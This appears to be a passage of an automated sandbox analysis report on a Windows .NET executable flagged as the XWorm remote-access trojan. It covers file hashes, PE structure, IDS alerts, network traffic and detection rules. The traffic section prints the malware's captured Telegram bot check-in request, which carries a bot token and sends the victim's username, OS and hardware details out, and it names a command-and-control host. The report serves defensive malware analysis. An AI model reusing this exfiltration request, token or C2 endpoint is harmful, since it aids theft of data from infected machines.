                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_odk4swbj.ptx.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t34fekhc.utb.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tpjrcxtd.zeq.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_varukukj.bly.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zfxaurn3.kw0.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zs4qdwzl.de4.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zv3n0vpr.wqm.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):4.615880115115375
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                          File name:9RgE5uOJwX.exe
                                                                                          File size:166'912 bytes
                                                                                          MD5:72f5f19b35b22d82d8459f5e0739c248
                                                                                          SHA1:0218dd2b354dcfdff2a11d06b6cf57f53987e9eb
                                                                                          SHA256:4571751b2b7477fded0012f46aded7c86fb93194980897418c17ac917c4d4cc1
                                                                                          SHA512:ae5fb16700e76a79049b9b92f13ead1d611b490a1e447adcc1a6da35be611e2c1e2fc618d17cc4f3a2052fd9b4cf261e12c1464474590c30647a40580e9e2d07
                                                                                          SSDEEP:1536:9QJaAtooQh0elU0qT9rbRCKGOjEkb2yMnx8Xb627dOnZzWEU:eJaNp9lVYoKGNkb2ymxMhOnZSEU
                                                                                          TLSH:9CF38CCB6E5042B7D3ADFA7048B3733D432BA97E6BC34E0EA49B3E4A573254C8841195
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...N..g................................. ... ....@.. ....................................@................................

                                                                                          File Icon

                                                                                          Icon Hash:8e172d4461e84423

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x410fbe
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x67100D4E [Wed Oct 16 19:00:30 2024 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                          Entrypoint Preview

                                                                                          Instruction
                                                                                          jmp dword ptr [00402000h]
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al

                                                                                          Data Directories

                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x10f700x4b.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x120000x1970e.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x2c0000xc.reloc
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                          Sections

                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x20000xefc40xf000f5e402e611efbcccc41bed341d098887False0.6063313802083333data6.031741596066072IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .rsrc0x120000x1970e0x19800790c09c179861bc5261255b9db54d9f5False0.07728247549019608data3.076758855643035IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .reloc0x2c0000xc0x20038c37bbf7eff4050483d2108781ec120False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                          Resources

                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                          RT_ICON0x122200xb5bPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9205366357069144
                                                                                          RT_ICON0x12d7c0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 655360.02651425529397847
                                                                                          RT_ICON0x235a40x4228Device independent bitmap graphic, 64 x 128 x 32, image size 163840.06004959848842702
                                                                                          RT_ICON0x277cc0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.1004149377593361
                                                                                          RT_ICON0x29d740x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.13062851782363977
                                                                                          RT_ICON0x2ae1c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.27925531914893614
                                                                                          RT_GROUP_ICON0x2b2840x5adata0.7333333333333333
                                                                                          RT_VERSION0x2b2e00x244data0.4706896551724138
                                                                                          RT_MANIFEST0x2b5240x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                                          Imports

                                                                                          DLLImport
                                                                                          mscoree.dll_CorExeMain

                                                                                          Network Behavior

                                                                                          Suricata IDS Alerts

                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                          2024-10-30T12:22:53.328109+01002853685ETPRO MALWARE Win32/XWorm Checkin via Telegram1192.168.2.649399149.154.167.220443TCP

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Oct 30, 2024 12:22:52.179806948 CET49399443192.168.2.6149.154.167.220
                                                                                          Oct 30, 2024 12:22:52.179848909 CET44349399149.154.167.220192.168.2.6
                                                                                          Oct 30, 2024 12:22:52.179920912 CET49399443192.168.2.6149.154.167.220
                                                                                          Oct 30, 2024 12:22:52.187416077 CET49399443192.168.2.6149.154.167.220
                                                                                          Oct 30, 2024 12:22:52.187428951 CET44349399149.154.167.220192.168.2.6
                                                                                          Oct 30, 2024 12:22:53.015554905 CET44349399149.154.167.220192.168.2.6
                                                                                          Oct 30, 2024 12:22:53.015830994 CET49399443192.168.2.6149.154.167.220
                                                                                          Oct 30, 2024 12:22:53.017664909 CET49399443192.168.2.6149.154.167.220
                                                                                          Oct 30, 2024 12:22:53.017683983 CET44349399149.154.167.220192.168.2.6
                                                                                          Oct 30, 2024 12:22:53.017934084 CET44349399149.154.167.220192.168.2.6
                                                                                          Oct 30, 2024 12:22:53.067354918 CET49399443192.168.2.6149.154.167.220
                                                                                          Oct 30, 2024 12:22:53.072253942 CET49399443192.168.2.6149.154.167.220
                                                                                          Oct 30, 2024 12:22:53.115333080 CET44349399149.154.167.220192.168.2.6
                                                                                          Oct 30, 2024 12:22:53.328115940 CET44349399149.154.167.220192.168.2.6
                                                                                          Oct 30, 2024 12:22:53.328186035 CET44349399149.154.167.220192.168.2.6
                                                                                          Oct 30, 2024 12:22:53.328424931 CET49399443192.168.2.6149.154.167.220
                                                                                          Oct 30, 2024 12:22:53.346575975 CET49399443192.168.2.6149.154.167.220
                                                                                          Oct 30, 2024 12:22:53.582041025 CET494061930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:22:53.587526083 CET193049406147.185.221.23192.168.2.6
                                                                                          Oct 30, 2024 12:22:53.587620974 CET494061930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:22:53.938579082 CET494061930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:22:53.944031000 CET193049406147.185.221.23192.168.2.6
                                                                                          Oct 30, 2024 12:23:02.084779978 CET193049406147.185.221.23192.168.2.6
                                                                                          Oct 30, 2024 12:23:02.084867001 CET494061930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:23:03.645735025 CET494061930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:23:03.647589922 CET494071930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:23:03.655503035 CET193049406147.185.221.23192.168.2.6
                                                                                          Oct 30, 2024 12:23:03.657320976 CET193049407147.185.221.23192.168.2.6
                                                                                          Oct 30, 2024 12:23:03.657397985 CET494071930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:23:03.677114010 CET494071930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:23:03.687040091 CET193049407147.185.221.23192.168.2.6
                                                                                          Oct 30, 2024 12:23:12.129286051 CET193049407147.185.221.23192.168.2.6
                                                                                          Oct 30, 2024 12:23:12.129434109 CET494071930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:23:16.504950047 CET494071930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:23:16.506784916 CET494091930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:23:16.510524035 CET193049407147.185.221.23192.168.2.6
                                                                                          Oct 30, 2024 12:23:16.512336016 CET193049409147.185.221.23192.168.2.6
                                                                                          Oct 30, 2024 12:23:16.512439013 CET494091930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:23:16.528563023 CET494091930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:23:16.534004927 CET193049409147.185.221.23192.168.2.6
                                                                                          Oct 30, 2024 12:23:24.991698027 CET193049409147.185.221.23192.168.2.6
                                                                                          Oct 30, 2024 12:23:24.991841078 CET494091930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:23:26.442692995 CET494091930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:23:26.445801973 CET494101930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:23:26.449553967 CET193049409147.185.221.23192.168.2.6
                                                                                          Oct 30, 2024 12:23:26.452541113 CET193049410147.185.221.23192.168.2.6
                                                                                          Oct 30, 2024 12:23:26.452672958 CET494101930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:23:26.472737074 CET494101930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:23:26.478382111 CET193049410147.185.221.23192.168.2.6
                                                                                          Oct 30, 2024 12:23:34.937421083 CET193049410147.185.221.23192.168.2.6
                                                                                          Oct 30, 2024 12:23:34.937524080 CET494101930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:23:36.692759991 CET494101930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:23:36.694552898 CET494111930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:23:36.698215008 CET193049410147.185.221.23192.168.2.6
                                                                                          Oct 30, 2024 12:23:36.700011969 CET193049411147.185.221.23192.168.2.6
                                                                                          Oct 30, 2024 12:23:36.700170040 CET494111930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:23:36.716130972 CET494111930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:23:36.721749067 CET193049411147.185.221.23192.168.2.6
                                                                                          Oct 30, 2024 12:23:45.183286905 CET193049411147.185.221.23192.168.2.6
                                                                                          Oct 30, 2024 12:23:45.183501959 CET494111930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:23:45.364578009 CET494111930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:23:45.365906000 CET494121930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:23:45.371422052 CET193049411147.185.221.23192.168.2.6
                                                                                          Oct 30, 2024 12:23:45.372663021 CET193049412147.185.221.23192.168.2.6
                                                                                          Oct 30, 2024 12:23:45.372756958 CET494121930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:23:45.387691975 CET494121930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:23:45.393650055 CET193049412147.185.221.23192.168.2.6
                                                                                          Oct 30, 2024 12:23:53.855021954 CET193049412147.185.221.23192.168.2.6
                                                                                          Oct 30, 2024 12:23:53.855159044 CET494121930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:23:53.942687988 CET494121930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:23:53.944118977 CET494141930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:23:53.948357105 CET193049412147.185.221.23192.168.2.6
                                                                                          Oct 30, 2024 12:23:53.949680090 CET193049414147.185.221.23192.168.2.6
                                                                                          Oct 30, 2024 12:23:53.949794054 CET494141930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:23:53.965507984 CET494141930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:23:53.970870972 CET193049414147.185.221.23192.168.2.6
                                                                                          Oct 30, 2024 12:24:00.378473043 CET494141930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:24:00.383905888 CET193049414147.185.221.23192.168.2.6
                                                                                          Oct 30, 2024 12:24:01.052356958 CET494141930192.168.2.6147.185.221.23
                                                                                          Oct 30, 2024 12:24:01.057881117 CET193049414147.185.221.23192.168.2.6
                                                                                          Oct 30, 2024 12:24:02.425492048 CET193049414147.185.221.23192.168.2.6
                                                                                          Oct 30, 2024 12:24:02.425585985 CET494141930192.168.2.6147.185.221.23

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Oct 30, 2024 12:22:40.061115026 CET5362527162.159.36.2192.168.2.6
                                                                                          Oct 30, 2024 12:22:41.022016048 CET53545881.1.1.1192.168.2.6
                                                                                          Oct 30, 2024 12:22:52.167454004 CET5791453192.168.2.61.1.1.1
                                                                                          Oct 30, 2024 12:22:52.174889088 CET53579141.1.1.1192.168.2.6
                                                                                          Oct 30, 2024 12:22:53.466389894 CET4982553192.168.2.61.1.1.1
                                                                                          Oct 30, 2024 12:22:53.500117064 CET53498251.1.1.1192.168.2.6

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Oct 30, 2024 12:22:52.167454004 CET192.168.2.61.1.1.10x633dStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                          Oct 30, 2024 12:22:53.466389894 CET192.168.2.61.1.1.10xf11Standard query (0)vehicle-temp.gl.at.ply.ggA (IP address)IN (0x0001)false

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Oct 30, 2024 12:22:52.174889088 CET1.1.1.1192.168.2.60x633dNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                          Oct 30, 2024 12:22:53.500117064 CET1.1.1.1192.168.2.60xf11No error (0)vehicle-temp.gl.at.ply.gg147.185.221.23A (IP address)IN (0x0001)false

                                                                                          HTTP Request Dependency Graph

                                                                                          • api.telegram.org

                                                                                          HTTPS Proxied Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.649399149.154.167.2204432732C:\Users\user\Desktop\9RgE5uOJwX.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-30 11:22:53 UTC452OUTGET /bot7754858173:AAGHhysa0geGaNnoiGNJaE5p14tWFWtQDWs/sendMessage?chat_id=7247076886&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AC0ADF584DA274A411213%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20K2C7BZM9L%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1
                                                                                          Host: api.telegram.org
                                                                                          Connection: Keep-Alive
                                                                                          2024-10-30 11:22:53 UTC346INHTTP/1.1 400 Bad Request
                                                                                          Server: nginx/1.18.0
                                                                                          Date: Wed, 30 Oct 2024 11:22:53 GMT
                                                                                          Content-Type: application/json
                                                                                          Content-Length: 73
                                                                                          Connection: close
                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                          2024-10-30 11:22:53 UTC73INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 63 68 61 74 20 6e 6f 74 20 66 6f 75 6e 64 22 7d
                                                                                          Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: chat not found"}


                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          General

                                                                                          Target ID:0
                                                                                          Start time:07:21:56
                                                                                          Start date:30/10/2024
                                                                                          Path:C:\Users\user\Desktop\9RgE5uOJwX.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\user\Desktop\9RgE5uOJwX.exe"
                                                                                          Imagebase:0xcf0000
                                                                                          File size:166'912 bytes
                                                                                          MD5 hash:72F5F19B35B22D82D8459F5E0739C248
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3411654159.0000000013028000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.3411654159.0000000013028000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
